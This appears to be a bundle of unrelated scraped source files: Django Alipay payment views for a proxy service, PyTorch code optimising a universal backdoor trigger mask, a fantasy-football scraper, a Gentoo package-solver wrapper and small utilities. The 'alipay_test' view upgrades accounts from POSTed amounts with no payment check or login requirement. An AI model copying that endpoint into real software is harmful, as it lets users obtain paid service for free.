return HttpResponse("accout_type_error")
if ACCOUNT_TRAFFIC_LIMIT[int(proxy_account.type)] > proxy_account.traffic:
reopen_port(proxy_account.port)
# 修改带宽和流量
upgrade_port(proxy_account.port, proxy_account.type)
else:
pay.status = 'F'
pay.save()
return HttpResponse("fail")
print("sava pay")
pay.status = 'S'
pay.trade_no = trade_no
pay.total_fee = real_fee
pay.save()
print("sava proxy_account")
proxy_account.save()
return HttpResponse("success")
except Exception as e:
print(e)
return HttpResponse("fail")
except Exception as e:
return HttpResponse("fail")
print(e)
@login_required(login_url="/login/")
def alipay_success(request):
is_user_login = request.user.is_authenticated()
proxy_account = ProxyAccount.objects.get(user=request.user)
return render_to_response('alipay_success.html', locals(), context_instance=RequestContext(request))
@login_required(login_url="/login/")
def alipay_cancel(request, pay_no):
print(pay_no)
pay = Pay.objects.filter(out_trade_no=pay_no)
if len(pay) != 1:
request.session["error"] = "cancel"
return HttpResponseRedirect('/homepage')
else:
pay[0].status = 'C'
pay[0].save()
return HttpResponseRedirect('/homepage')
def alipay_test(request):
pay_type = int(request.POST['pay_type'])
month = int(request.POST['month'])
total_fee = float(request.POST['money'])
total_fee *= RATE
proxy_account = ProxyAccount.objects.get(user=request.user)
real_fee = float(total_fee/RATE)
print('realfee', real_fee)
if pay_type == 1:
account_type = int(real_fee)/int(month)
print("accounttype", account_type)
if account_type not in {1, 5, 10, 20, 50}:
return HttpResponse("accout_type_error")
else:
print("success:", account_type, " month", month)
proxy_account.type = account_type
today = datetime.datetime.now()
if proxy_account.expired_date is not None:
print("add month")
return HttpResponse("not init")
else:
print("init month")
expired_date = today + datetime.timedelta(30*int(month))
if proxy_account.paydate is None:
print("init paydate")
create_pac(proxy_account)
print("create_pac done")
open_listen_port(proxy_account.port, proxy_account.type)
print("open_listen_port done")
proxy_account.paydate = today
proxy_account.expired_date = expired_date
elif pay_type == 2:
account_type = int(real_fee)/int(month)
print("accounttype", account_type)
if account_type != proxy_account.type or proxy_account.expired_date is None:
return HttpResponse("accout_type_error")
else:
print("success:", account_type, " month", month)
today = datetime.date.today()
print("add month")
if proxy_account.expired_date < today:
expired_date = today + datetime.timedelta(30*int(month))
else:
expired_date = proxy_account.expired_date + datetime.timedelta(30*int(month))
proxy_account.expired_date = expired_date
elif pay_type == 3:
upgrade_delta = (real_fee/month)*30
upgrade_delta = int(upgrade_delta+0.1)
print(upgrade_delta)
proxy_account.type += upgrade_delta
if proxy_account.type not in {1, 5, 10, 20, 50}:
return HttpResponse("accout_type_error")
reopen_port(proxy_account.port)
else:
return HttpResponse("fail")
print("sava proxy_account")
proxy_account.save()
return HttpResponseRedirect('/homepage')
|
flyz1360/scholarcloud
|
thuproxy/pay_views.py
|
pay_views.py
|
py
| 14,990 |
python
|
en
|
code
| 1 |
github-code
|
6
|
74550779386
|
import torch
from torch import Tensor, nn
import torchvision
import os
import numpy as np
class Normalize:
def __init__(self, n_channels, expected_values, variance):
self.n_channels = n_channels
self.expected_values = expected_values
self.variance = variance
assert self.n_channels == len(self.expected_values)
def __call__(self, x):
x_clone = x.clone()
for channel in range(self.n_channels):
x_clone[:, channel] = (x[:, channel] - self.expected_values[channel]) / self.variance[channel]
return x_clone
class Denormalize:
def __init__(self, n_channels, expected_values, variance):
self.n_channels = n_channels
self.expected_values = expected_values
self.variance = variance
assert self.n_channels == len(self.expected_values)
def __call__(self, x):
x_clone = x.clone()
for channel in range(self.n_channels):
x_clone[:, channel] = x[:, channel] * self.variance[channel] + self.expected_values[channel]
return x_clone
class RegressionModel(nn.Module):
def __init__(self, task, model, init_mask, init_pattern):
self._EPSILON = 1e-7
super(RegressionModel, self).__init__()
self.mask_tanh = nn.Parameter(torch.tensor(init_mask))
self.pattern_tanh = nn.Parameter(torch.tensor(init_pattern))
self.classifier = self._get_classifier(model)
self.normalizer = self._get_normalize(task)
self.denormalizer = self._get_denormalize(task)
def forward(self, x):
mask = self.get_raw_mask()
pattern = self.get_raw_pattern()
if self.normalizer:
pattern = self.normalizer(self.get_raw_pattern())
x = (1 - mask) * x + mask * pattern
return self.classifier(x)
def get_raw_mask(self):
mask = nn.Tanh()(self.mask_tanh)
return mask / (2 + self._EPSILON) + 0.5
def get_raw_pattern(self):
pattern = nn.Tanh()(self.pattern_tanh)
return pattern / (2 + self._EPSILON) + 0.5
def _get_classifier(self, model):
classifier = model
for param in classifier.parameters():
param.requires_grad = False
classifier.eval()
return classifier.to('cuda')
def _get_denormalize(self, task):
if task == 'cifar10':
denormalizer = Denormalize(3, [0.4914, 0.4822, 0.4465], [0.247, 0.243, 0.261])
elif task == 'mnist':
denormalizer = Denormalize(1, [0.5], [0.5])
elif task == 'imageNet':
denormalizer = Denormalize(3,[0.485,0.456,0.406],[0.229,0.224,0.225])
elif task == 'gtsrb':
denormalizer = None
else:
raise Exception("Invalid dataset")
return denormalizer
def _get_normalize(self, task):
if task == 'cifar10':
normalizer = Normalize(3, [0.4914, 0.4822, 0.4465], [0.247, 0.243, 0.261])
elif task == 'mnist':
normalizer = Normalize(1, [0.5], [0.5])
elif task == 'imageNet':
normalizer = Denormalize(3,[0.485,0.456,0.406],[0.229,0.224,0.225])
elif task == 'gtsrb':
normalizer = None
else:
raise Exception("Invalid dataset")
return normalizer
class Recorder:
def __init__(self,target_label,task):
super().__init__()
# Best optimization results
self.mask_best = None
self.pattern_best = None
self.reg_best = float('inf')
self.target_label = target_label
# Logs and counters for adjusting balance cost
self.logs = []
self.cost_set_counter = 0
self.cost_up_counter = 0
self.cost_down_counter = 0
self.cost_up_flag = False
self.cost_down_flag = False
# Counter for early stop
self.early_stop_counter = 0
self.early_stop_reg_best = self.reg_best
# Cost
self.cost = 1e-3
self.cost_multiplier_up = 2
self.cost_multiplier_down = 2 ** 1.5
self.task = task
def reset_state(self):
self.cost = 1e-3
self.cost_up_counter = 0
self.cost_down_counter = 0
self.cost_up_flag = False
self.cost_down_flag = False
print("Initialize cost to {:f}".format(self.cost))
def save_result_to_dir(self):
result_dir = '%s/u_t_%s'%(self.task,self.task)
if not os.path.exists(result_dir):
os.makedirs(result_dir)
result_dir = os.path.join(result_dir, str(self.target_label))
if not os.path.exists(result_dir):
os.makedirs(result_dir)
pattern_best = self.pattern_best
mask_best = self.mask_best
trigger = pattern_best * mask_best
path_mask = os.path.join(result_dir, 'mask.png')
path_pattern = os.path.join(result_dir, 'pattern.png')
path_trigger = os.path.join(result_dir, 'trigger.png')
torchvision.utils.save_image(mask_best, path_mask, normalize=True)
torchvision.utils.save_image(pattern_best, path_pattern, normalize=True)
torchvision.utils.save_image(trigger, path_trigger, normalize=True)
class UniversalTrigger:
def __init__(self):
self.universal_trigger_dict = {}
def train(task, model, target_label, init_mask, init_pattern, test_loader):
# Build regression model
regression_model = RegressionModel(task, model, init_mask, init_pattern).to('cuda')
# Set optimizer
optimizerR = torch.optim.Adam(regression_model.parameters(), lr=1e-1, betas=(0.5, 0.9))
# Set recorder (for recording best result)
recorder = Recorder(target_label,task)
for epoch in range(50):
early_stop = train_step(regression_model, optimizerR, test_loader, recorder, epoch, target_label)
if early_stop:
break
# Save result to dir
recorder.save_result_to_dir()
return recorder
def train_step(regression_model, optimizerR, dataloader, recorder, epoch, target_label,early_stop=True):
print("Epoch {} - Label: {}".format(epoch, target_label))
# Set losses
cross_entropy = nn.CrossEntropyLoss()
total_pred = 0
true_pred = 0
# Record loss for all mini-batches
loss_ce_list = []
loss_reg_list = []
loss_list = []
loss_acc_list = []
# Set inner early stop flag
inner_early_stop_flag = False
for batch_idx, (inputs, labels) in enumerate(dataloader):
# Forwarding and update model
optimizerR.zero_grad()
inputs = inputs.to('cuda')
sample_num = inputs.shape[0]
total_pred += sample_num
target_labels = torch.ones((sample_num), dtype=torch.int64).to('cuda') * target_label
predictions = regression_model(inputs)
loss_ce = cross_entropy(predictions, target_labels)
loss_reg = torch.norm(regression_model.get_raw_mask(), 2)
total_loss = loss_ce + recorder.cost * loss_reg
total_loss.backward()
optimizerR.step()
# Record minibatch information to list
minibatch_accuracy = torch.sum(torch.argmax(predictions, dim=1) == target_labels).detach() * 100. / sample_num
loss_ce_list.append(loss_ce.detach())
loss_reg_list.append(loss_reg.detach())
loss_list.append(total_loss.detach())
loss_acc_list.append(minibatch_accuracy)
true_pred += torch.sum(torch.argmax(predictions, dim=1) == target_labels).detach()
loss_ce_list = torch.stack(loss_ce_list)
loss_reg_list = torch.stack(loss_reg_list)
loss_list = torch.stack(loss_list)
loss_acc_list = torch.stack(loss_acc_list)
avg_loss_ce = torch.mean(loss_ce_list)
avg_loss_reg = torch.mean(loss_reg_list)
avg_loss = torch.mean(loss_list)
avg_loss_acc = torch.mean(loss_acc_list)
# Check to save best mask or not
if avg_loss_acc >= 99. and avg_loss_reg < recorder.reg_best:
recorder.mask_best = regression_model.get_raw_mask().detach()
recorder.pattern_best = regression_model.get_raw_pattern().detach()
recorder.reg_best = avg_loss_reg
recorder.save_result_to_dir()
print(" Updated !!!")
# Show information
print(' Result: Accuracy: {:.3f} | Cross Entropy Loss: {:.6f} | Reg Loss: {:.6f} | Reg best: {:.6f}'.format(
true_pred * 100. / total_pred,
avg_loss_ce,
avg_loss_reg,
recorder.reg_best))
# Check early stop
if early_stop:
if recorder.reg_best < float('inf'):
if recorder.reg_best >= 99. * recorder.early_stop_reg_best:
recorder.early_stop_counter += 1
else:
recorder.early_stop_counter = 0
recorder.early_stop_reg_best = min(recorder.early_stop_reg_best, recorder.reg_best)
if (
recorder.cost_down_flag and recorder.cost_up_flag and recorder.early_stop_counter >= 25):
print('Early_stop !!!')
inner_early_stop_flag = True
if not inner_early_stop_flag:
# Check cost modification
if recorder.cost == 0 and avg_loss_acc >= 99.:
recorder.cost_set_counter += 1
if recorder.cost_set_counter >= 5:
recorder.reset_state()
else:
recorder.cost_set_counter = 0
if avg_loss_acc >= 99.:
recorder.cost_up_counter += 1
recorder.cost_down_counter = 0
else:
recorder.cost_up_counter = 0
recorder.cost_down_counter += 1
if recorder.cost_up_counter >= 5:
recorder.cost_up_counter = 0
print("Up cost from {} to {}".format(recorder.cost, recorder.cost * recorder.cost_multiplier_up))
recorder.cost *= recorder.cost_multiplier_up
recorder.cost_up_flag = True
elif recorder.cost_down_counter >= 5:
recorder.cost_down_counter = 0
print("Down cost from {} to {}".format(recorder.cost, recorder.cost / recorder.cost_multiplier_down))
recorder.cost /= recorder.cost_multiplier_down
recorder.cost_down_flag = True
# Save the final version
if recorder.mask_best is None:
recorder.mask_best = regression_model.get_raw_mask().detach()
recorder.pattern_best = regression_model.get_raw_pattern().detach()
return inner_early_stop_flag
|
Mr-Ace-1997/SGBA-A-Stealthy-Scapegoat-Backdoor-Attack-against-Deep-Neural-Networks
|
utils_universal_trigger.py
|
utils_universal_trigger.py
|
py
| 10,352 |
python
|
en
|
code
| 0 |
github-code
|
6
|
10502382952
|
class Solution:
# @param A : string
# @return an integer
def atoi(self, s):
s = s.strip() # strips all spaces on left and right
if not s: return 0
sign = -1 if s[0] == '-' else 1
val, index = 0, 0
if s[0] in ['+', '-']: index = 1
while index < len(s) and s[index].isdigit():
val = val*10 + ord(s[index]) - ord('0') # assumes there're no invalid chars in given string
index += 1
#return sign*val
return max(-2**31, min(sign * val,2**31-1))
|
anojkr/help
|
interview_bit/string/atoi.py
|
atoi.py
|
py
| 542 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26191759535
|
import requests
import json
import re
import time
import csv
import MySQLdb as mdb
from bs4 import BeautifulSoup
import numpy as np
import pandas as pd
from helpers import *
"""
This script scrapes and stores the fantasy points achieved by each player for the 2013 season.
The data is stored in a .csv file.
"""
def main():
#open .csv file to store data and writes col names
wfile = open("espn-actual2.csv", "wb")
field_names = ['game_id', 'plyr_id', 'tot_pts','week']
writer = csv.writer(wfile)
writer.writerow(field_names)
#for each week in the 2013 season, the player id, game id, and points scored are scraped and stored in the .csv file
for w in range(1,3):
for pg in range(0, 300, 50):
pts_url = "http://games.espn.go.com/ffl/leaders?&scoringPeriodId=%s&seasonId=2013&startIndex=%s" % (w, pg)
pts_res = requests.get(pts_url)
soup = BeautifulSoup(pts_res.content)
for tr in soup.find_all('tr', class_="pncPlayerRow"):
id_match = re.search(r'plyr(\d+)',tr['id'])
id = int(id_match.group(1))
td_pts = tr.find('td', class_="playertableStat appliedPoints appliedPointsProGameFinal")
projpts = td_pts.contents[0].encode('ascii', 'ignore')
td_game = tr.find('td', class_="gameStatusDiv")
href = td_game.find('a')
href_str = str(href)
game_match = re.search(r'gameId=(\d+)', href_str)
game_id = game_match.group(1)
if projpts == '--':
projpts = 0
data = [game_id, id, projpts, w]
writer.writerow(data)
wfile.close()
if __name__ == '__main__':
main()
|
kwheeler27/insight_datasci
|
data/actual_fantasy_pts.py
|
actual_fantasy_pts.py
|
py
| 1,604 |
python
|
en
|
code
| 1 |
github-code
|
6
|
26829757478
|
#!/usr/bin/python
import json
import utils
import logging
import os
import subprocess
import smt_encoding
import pysmt.shortcuts
import re
import requests
import core_data
import hyportage_pattern
import hyportage_db
from pysmt.smtlib.parser import SmtLib20Parser
import cStringIO
"""
This file contains all the functions related to solving the constraints generated from a set of spls,
in order to compute a new configuration of the system
"""
__author__ = "Michael Lienhardt and Jacopo Mauro"
__copyright__ = "Copyright 2017, Michael Lienhardt and Jacopo Mauro"
__license__ = "GPL3"
__version__ = "0.5"
__maintainer__ = "Michael Lienhardt and Jacopo Mauro"
__email__ = "michael [email protected] & [email protected]"
__status__ = "Prototype"
##########################################################################
# UTILITIES TO CALL THE HYVAR-REC SOLVER
##########################################################################
def run_local_hyvar(json_data, explain_modality, cmd, par_cores):
"""
Run hyvar locally assuming that there is a command hyvar-rec
"""
file_name = utils.get_new_temp_file(".json")
with open(file_name, "w") as f:
json.dump(json_data, f)
cmd.extend(["--constraints-minimization", "--features-as-boolean", "--no-default-preferences"])
if explain_modality: cmd.append("--explain")
if par_cores > 1: cmd.extend(["-p", unicode(par_cores)])
cmd.append(file_name)
# executing the solver
utils.phase_start("Running: " + unicode(cmd))
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = process.communicate()
if process.returncode != 0:
logging.error("command ended with an error code: " + str(process.returncode))
return None
logging.debug("Stderr of the command")
logging.debug(err)
utils.phase_end("Execution ended")
res = json.loads(out)
return res
def run_remote_hyvar(json_data, explain_modality, url):
"""
Run hyvar
"""
if explain_modality: url += "/explain"
else: url += "/process"
utils.phase_start("Invoking url: " + url)
response = requests.post(url, data=json.dumps(json_data), headers={'content-type': 'application/json'})
utils.phase_end("Execution ended")
if response.status_code != requests.codes.ok:
logging.error("server answered with an error code: " + str(response.status_code))
return None
res = response.json()
if 'error' in res:
logging.error("server answered with an error message: " + json.dumps(res))
return None
return res
run_hyvar = None
##########################################################################
# 1. INITIALIZE THE DATA (COMPUTE REQUEST AND UPDATE THE DATABASE)
##########################################################################
def process_request(pattern_repository, id_repository, config, atoms):
"""
This function simply takes the user request and his USE configuration from the environment,
and translate them in relevant data
:param pattern_repository: the pattern repository of hyportage
:param id_repository: the id repository of hyportage
:param mspl: the mspl of hyportage
:param spl_groups: the spl_groups of hyportage
:param config: the config object
:param atoms: the user request
:return: the list of spls involved in the request (extended with the ones in the config),
with the corresponding SMT constraint.
Additionally, the pattern repository is extended with the new patterns,
and the config object have been updated with th USE user configuration
"""
requested_patterns = set([hyportage_pattern.pattern_create_from_atom(atom) for atom in atoms])
requested_patterns.update(config.pattern_required_flat)
config.set_use_manipulation_env(os.environ.get("USE", "").split())
root_spls, constraint = smt_encoding.convert_patterns(pattern_repository, id_repository, requested_patterns)
return root_spls, constraint
##########################################################################
# 2. SOLVER WRAPPER
##########################################################################
def get_preferences_core(id_repository, mspl, installed_spls, spl_name_set):
"""
the priority of preferences is decided as follows:
- remove less packages installed as possible,
- minimize number of new packages to install
:param id_repository: the repository of hyportage
:param mspl: the mspl of hyportage
:param installed_spls: the currently installed spls with their configuration
:param spl_name_set: the names of the spls considered in the reconfiguration process
:return: an equation encoding the preference as described previously
"""
installed_spls = {
spl_name
for spl_name in installed_spls.iterkeys()
if (spl_name in spl_name_set) and (not mspl[spl_name].is_deprecated)}
uninstalled_spls = spl_name_set - installed_spls
# preference for removing less packages installed and not deprecated as possible
res = '0'
if installed_spls:
res = " + ".join([
smt_encoding.get_spl_hyvarrec(id_repository, spl_name) for spl_name in installed_spls])
# preference to minimize number of new packages to install
if uninstalled_spls:
res = res + " - (" + (" + ".join([
smt_encoding.get_spl_hyvarrec(id_repository, spl_name) for spl_name in uninstalled_spls])) + ")"
return [res]
def get_preferences_use_flags(id_repository, mspl, spl_names):
"""
This function translates the use flag default selection of the spl in parameter into a preferences
TODO: implement this function. It requires an API change in the SPL class to do it efficiently.
:param id_repository: the id repository of hyportage
:param mspl: the mspl of hyportage
:param spl_names: the names of the spls to include in the preferences construction
:return: an equation encoding the default configuration of the spls in parameter
"""
use_flags_positive = set()
use_flag_negative = set()
return 0
def installed_spls_to_solver(id_repository, installed_spls, spl_names):
res = []
for spl_name, use_selection in installed_spls.iteritems():
if spl_name in spl_names:
res.append(smt_encoding.get_spl_hyvarrec(id_repository, spl_name))
return res
def get_better_constraint_visualization(id_repository, mspl, constraints):
"""
function that manipulates the constraints in a more readable form for analysing them.
Useful for debugging or error reporting
:param id_repository: the id repository of hyportage
:param mspl: the mspl of hyportage
:param constraints: the constraints to manipulate
:return: the manipulated constraints
"""
ls = []
parser = SmtLib20Parser()
for i in constraints:
f = cStringIO.StringIO(i)
script = parser.get_script(f)
f.close()
formula = script.get_last_formula()
formula = pysmt.shortcuts.to_smtlib(formula, daggify=False)
# translate packages
where_declared = "user-required: "
spl_ids = set(re.findall('(p[0-9]+)', formula))
for spl_id in spl_ids:
name = id_repository.ids[spl_id][1]
formula = re.sub(spl_id, name, formula)
if i in mspl[name].smt:
where_declared = name + ": "
# translate uses
use_ids = set(re.findall('(u[0-9]+)', formula))
for use_id in use_ids:
formula = re.sub(use_id, id_repository.ids[use_id][2] + "#" + id_repository.ids[use_id][1], formula)
ls.append(where_declared + formula)
return ls
def generate_to_install_spls(id_repository, mspl, feature_list):
"""
translate the output of the solver into a system to install (mapping from spl names to use flag selection)
:param id_repository: the id repository of hyportage
:param mspl: the mspl of hyportage
:param feature_list: the solution found by the solver
:return: a dictionary spl_name -> use flag selection
"""
# 1. translate the computed solution into a configuration
res_core = core_data.dictSet()
use_flags = []
for feature in feature_list:
el = id_repository.data_from_id(feature)
if el[0] == "package": # el = ("package", spl_name)
res_core.add_key(el[1])
else: # el = ("use", use, spl_name)
use_flags.append((el[1], el[2]))
for use_flag, spl_name in use_flags:
if spl_name in res_core:
res_core.add(spl_name, use_flag)
# 2. compares the computed solution to the actual spl use flag configuration, and generate the final configuration
res = core_data.dictSet()
for spl_name, use_selection_core in res_core.iteritems():
spl = mspl[spl_name]
if spl.use_selection_core == use_selection_core:
res[spl_name] = spl.use_selection_full
else:
annex_use_flags = spl.use_selection_full - spl.iuses_core
res[spl_name] = use_selection_core | annex_use_flags
return res
def solve_spls(
id_repository, config, mspl, spl_groups,
spls, annex_constraint, exploration_use, exploration_mask, exploration_keywords, explain_modality=False):
"""
Solves the spls in input locally assuming that there is a command hyvar-rec
:param id_repository: the id repository of hyportage
:param config: the config of hyportage
:param mspl: the mspl of hyportage
:param spl_groups: the spl groups of hyportage
:param spls: the spls to solve
:param annex_constraint: the additional constraint to add in the solver input
:param exploration_use: boolean saying if the solver can change the use flag default selection
:param exploration_mask: boolean saying if the solver can change the use mask status of the packages
:param exploration_keywords: boolean saying if the solver can change the keywords of the packages
:param explain_modality: boolean saying if a problem should be explained (by default: False)
:return: the solution found by the solver, if it exists
"""
# 1. construct the input data for the solver
# 1.1. construct the constraint
constraint = annex_constraint[:]
spl_group_names = core_data.dictSet()
#tmp = 0
for spl in spls:
spl_group_names.add(core_data.spl_core_get_spl_group_name(spl.core), spl)
included = (spl.unmasked or exploration_mask) and (spl.unmasked_keyword or exploration_keywords)
if included:
#tmp = tmp + 1
constraint.extend(spl.smt)
if exploration_use:
constraint.extend(spl.smt_use_exploration)
else:
constraint.extend(spl.smt_use_selection)
else:
#logging.info("spl \"" + spl.name + "\" is not scheduled for possible installation")
constraint.extend(spl.smt_false)
for spl_group_name, spls_tmp in spl_group_names.iteritems():
spl_group = spl_groups[spl_group_name]
constraint.extend(spl_group.smt)
for spl in spl_group:
if spl not in spls_tmp: constraint.append(smt_encoding.smt_to_string(smt_encoding.get_spl_smt_not(id_repository, spl.name)))
#logging.info("included spl: " + str(tmp))
logging.debug("number of constraints to solve: " + str(len(constraint)))
# 1.2. construct the preferences
spl_names = {spl.name for spl in spls}
preferences = get_preferences_core(id_repository, mspl, config.installed_packages, spl_names)
# 1.3. construct the current system
current_system = [] #installed_spls_to_solver(id_repository, installed_spls, spl_names)
data_configuration = {"selectedFeatures": current_system, "attribute_values": [], "context_values": []} # current configuration
data_smt_constraints = {"formulas": constraint, "features": [], "other_int_symbols": []}
data = {
"attributes": [], # attributes of the features (empty in our case)
"contexts": [], # contexts to consider (empty in our case)
"configuration": data_configuration,
"constraints": [], # constraints to fill in hyvarrec format (empty in our case for efficiency)
"preferences": preferences, # preferences in hyvarrec format
"smt_constraints": data_smt_constraints,
"hyvar_options": ["--features-as-boolean", "--constraints-minimization", "--no-default-preferences"]
}
# 2. run hyvar-rec
res = run_hyvar(data)
if res is None: return None
logging.debug("HyVarRec output: " + json.dumps(res))
# 4. managing the solver output
if res["result"] != "sat":
if explain_modality:
# todo handle explain modality when the answer is unsat
# try to print a better explanation of the constraints
constraints = get_better_constraint_visualization(id_repository, mspl, res["constraints"])
logging.error("Conflict detected. Explanation:\n" + "\n".join(constraints) + '\n')
return None
return generate_to_install_spls(id_repository, mspl, res['features'])
def generate_installation_files(
mspl,
path_emerge_script, path_use_flag_configuration, path_mask_configuration, path_keywords_configuration,
old_installation, new_installation):
"""
This function generates two files:
1. the script file to execute to install and uninstall the spls found by the solver
2. spl configuration file (usually package.use) from the solution found by the solver
:param mspl: the mspl of hyportage
:param path_emerge_script: path to the script file to generate
:param path_use_flag_configuration: path to the configuration file to generate
:param path_mask_configuration: the path to the unmask file to generate
:param path_keywords_configuration: the path to the accept_keywords file to generate
:param old_installation: the currently installed spls
:param new_installation: the spls to install, found by the solver
:return: None (but the script file has been generated)
"""
# the spls to emerge are the ones that are not present in the old installation, or that have a new configuration
added_spl_names = []
for spl_name, product in new_installation.iteritems():
if spl_name in old_installation:
if old_installation[spl_name] != product:
added_spl_names.append(spl_name)
else: added_spl_names.append(spl_name)
# the spls to remove are the ones that are not in the new configuration and that are not replaced by a new version
removed_spl_names = []
new_spl_goups_info = core_data.dictSet()
for spl_name in new_installation.iterkeys():
spl = mspl[spl_name]
new_spl_goups_info.add(core_data.spl_core_get_spl_group_name(spl.core), spl)
for spl_name in old_installation.iterkeys():
spl = mspl[spl_name]
new_versions = new_spl_goups_info.get(core_data.spl_core_get_spl_group_name(spl.core))
if new_versions is None:
removed_spl_names.append(spl_name)
else:
replaced = False
for new_spl in new_versions:
if (spl.slot == new_spl.slot) and (spl.name != new_spl.name):
replaced = True
break
if replaced: removed_spl_names.append(spl_name)
# write the files
added_spl_names.sort()
with open(path_emerge_script, 'w') as f:
f.write("#!/bin/bash\n")
f.write("\n")
f.write("# File auto-generated by the hyportage tool\n")
f.write("# Do not update, any modification on this file will will overwritten by the tool\n")
f.write("\n")
if added_spl_names:
f.write("emerge -p --newuse " + " ".join(["=" + spl_name for spl_name in added_spl_names]) + "\n")
if removed_spl_names:
f.write("emerge -p --unmerge " + " ".join(["=" + spl_name for spl_name in removed_spl_names]) + "\n")
f.write("\n")
with open(path_use_flag_configuration, 'w') as f:
f.write("# File auto-generated by the hyportage tool\n")
f.write("# Do not update, any modification on this file will will overwritten by the tool\n")
f.write("\n")
for spl_name in added_spl_names:
use_selection = new_installation[spl_name]
string = "=" + spl_name + " "
string = string + " ".join(use_selection)
use_unselection = mspl[spl_name].iuses_full - use_selection
if use_unselection:
string = string + " -" + " -".join(use_unselection) + "\n"
f.write(string)
f.write("\n")
with open(path_mask_configuration, 'w') as f:
f.write("# File auto-generated by the hyportage tool\n")
f.write("# Do not update, any modification on this file will will overwritten by the tool\n")
f.write("\n")
for spl_name in added_spl_names:
f.write("=" + spl_name + "\n")
#if not mspl[spl_name].unmasked:
# f.write("=" + spl_name)
f.write("\n")
with open(path_keywords_configuration, 'w') as f:
f.write("# File auto-generated by the hyportage tool\n")
f.write("# Do not update, any modification on this file will will overwritten by the tool\n")
f.write("\n")
for spl_name in added_spl_names:
#f.write("=" + spl_name + " ~" + hyportage_db.mspl_config.arch + "\n")
f.write("=" + spl_name + " **\n")
#if not mspl[spl_name].unmasked_keyword:
# f.write("=" + spl_name + " ~" + hyportage_db.mspl_config.arch)
f.write("\n")
##########################################################################
# 3. SPL SET COMPUTATION
##########################################################################
def next_spls(pattern_repository, spl):
res = set()
pattern_iterator = spl.dependencies.iterkeys()
for pattern in pattern_iterator:
res.update(pattern_repository.get_with_default(pattern).matched_spls)
return res
def get_dependency_transitive_closure(pattern_repository, mspl, spls):
for spl in mspl.itervalues():
spl.visited = False
nexts = spls
res = set()
while len(nexts) > 0:
accu = set()
for spl in nexts:
spl.visited = True
res.add(spl)
accu.update(next_spls(pattern_repository, spl))
nexts = filter(lambda spl: not spl.visited, accu)
return res
|
HyVar/gentoo_to_mspl
|
host/scripts/reconfigure.py
|
reconfigure.py
|
py
| 16,982 |
python
|
en
|
code
| 10 |
github-code
|
6
|
31215041211
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('siteScrape', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='teacher',
name='averageGrade',
field=models.CharField(default=b'', max_length=3),
),
migrations.AddField(
model_name='teacher',
name='responseRate',
field=models.DecimalField(default=0, max_digits=3, decimal_places=2),
),
migrations.AlterField(
model_name='teacher',
name='quarters',
field=models.IntegerField(default=0),
),
]
|
anikan/Classify
|
migrations/0002_auto_20150910_1439.py
|
0002_auto_20150910_1439.py
|
py
| 755 |
python
|
en
|
code
| 0 |
github-code
|
6
|
38465761430
|
from Christiaan.csvLoading.CSVLoader import read_csv_tableau
from Christiaan.dataCleaning.dataCleaner import cleanTechColumn
import pandas as pd
import numpy as np
def readTechCSV(filename):
df = read_csv_tableau(filename, filename)
df = df[['Employee Number', 'Firstname Firstname', 'Lastname Lastname', 'Level Level', 'Practice Practice', 'Suggested Daily Rate', 'Name Name']]
df.columns =['Employee Number', 'Firstname', 'Lastname', 'Level', 'Practice', 'Suggested Daily Rate', 'Technology']
df.sort_values('Employee Number', inplace=True)
return df
def fixLevels(dataFrame):
emp_first_names = ['Jean-Francois',
'Arnaud',
'Vasilij',
'Pieter',
'Koen',
'Faisal',
'Gunther',
'Philip',
'Geoffrey']
emp_last_names = ['Gigot',
'Deflorenne',
'Nevlev',
'Vandamme',
'Dils',
'Orakzai',
'Hellebaut',
'Allegaert',
'Moerenhoudt']
for i in range(len(emp_first_names)):
f = emp_first_names[i]
l = emp_last_names[i]
if f == 'Jean-Francois' and l == 'Gigot':
dataFrame.loc[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l),'Level'] = 'Director'
elif f == 'Arnaud' and l == 'Deflorenne':
dataFrame.loc[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l),'Level'] = 'Partner'
elif f == 'Vasilij' and l == 'Nevlev':
dataFrame.drop(dataFrame[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l)].index, axis=0, inplace=True)
elif f == 'Pieter' and l == 'Vandamme':
dataFrame.loc[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l),'Level'] = 'Director'
elif f == 'Koen' and l == 'Dils':
dataFrame.loc[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l),'Level'] = 'Director'
elif f == 'Faisal' and l == 'Orakzai':
dataFrame.loc[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l),'Level'] = 'Senior'
elif f == 'Gunther' and l == 'Hellebaut':
dataFrame.loc[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l),'Level'] = 'Senior'
elif f == 'Philip' and l == 'Allegaert':
dataFrame.loc[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l),'Level'] = 'Director'
elif f == 'Geoffrey' and l == 'Moerenhoudt':
dataFrame.loc[np.logical_and(dataFrame.Firstname == f, dataFrame.Lastname == l),'Level'] = 'Consultant'
dataFrame.loc[np.logical_or(dataFrame.Level=='Senior 13', dataFrame.Level=='Senior 8'),'Level'] = 'Senior'
return dataFrame
def cleanTech(dataFrame, techColumnName):
df = cleanTechColumn(dataFrame, techColumnName)
df.drop_duplicates(inplace=True)
df = fixLevels(df)
return df
def exportDF(dataFrame, fileName, path=''):
dataFrame.to_csv(path_or_buf=path+fileName, sep=',', index=False)
# Read Tableau csv export
file = r'C:\Users\adebola.oshomoji\PycharmProjects\case-keyrus\tableau_technology_export.csv'
df = readTechCSV(file)
# Clean Technology column values and drop duplicates
df = cleanTech(df, 'Technology')
# Write DataFrame to csv
exportDF(df, 'EmployeeTechnologyData.csv')
#print(df.Level.unique())
|
chrike-platinum/training-recommender
|
Ade/visualisationPrep.py
|
visualisationPrep.py
|
py
| 3,541 |
python
|
en
|
code
| 0 |
github-code
|
6
|
648818691
|
from argparse import ArgumentParser
from inference import Infer
parser = ArgumentParser()
parser.add_argument("modelname", help="name of model to use")
parser.add_argument("imagepath", help="relative path to image")
parser.add_argument("--use_gpu", help="use gpu or not", nargs="?", default=False, const=True, type = bool)
args = parser.parse_args()
infer = Infer(args.use_gpu)
try:
